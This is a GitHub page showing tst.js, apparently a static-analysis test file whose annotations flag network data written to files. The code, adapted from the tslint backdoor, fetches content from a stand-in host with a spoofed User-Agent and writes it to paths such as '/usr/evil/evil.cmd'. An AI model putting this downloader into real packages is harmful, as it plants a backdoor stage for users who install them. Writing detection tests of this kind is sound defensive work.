-
Notifications
You must be signed in to change notification settings - Fork 2k
Expand file tree
/
Copy pathtst.js
More file actions
41 lines (38 loc) · 1.41 KB
/
tst.js
File metadata and controls
41 lines (38 loc) · 1.41 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
// adopted from tslint backdoor, see https://gist.github.com/hzoo/51cb84afdc50b14bffa6c6dc49826b3e
try {
var https = require('https');
var fs = require('fs');
https.get({
'hostname': 'example.com', path: '/raw/XXXXXXXX', headers:
{
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
},
(response) => {
response.setEncoding('utf8');
response.on('data', (c) => { // $ Source
fs.writeFile("/tmp/test", c, (err) => {}); // $ Alert - data from response 'on' event flows to file
let writeStream = fs.createWriteStream('/usr/evil/evil.cmd');
writeStream.write(c); // $ Alert - data from response 'on' event flows to filestream write
writeStream.end();
var stream = fs.createWriteStream("my_file.txt");
stream.once('open', function (fd) {
stream.write(c); // $ Alert - data from response 'on' event flows to filestream write
stream.end();
});
});
response.on('error', () =>
{
fs.writeFile("/tmp/test", "error occured"); // OK - static data written to file
});
}).on('error', () =>
{
let error = "error occured";
let writeStream = fs.createWriteStream('/usr/good/errorlog.txt');
writeStream.write(error); // OK - static data written to file stream
writeStream.end();
});
}
catch (e) {
}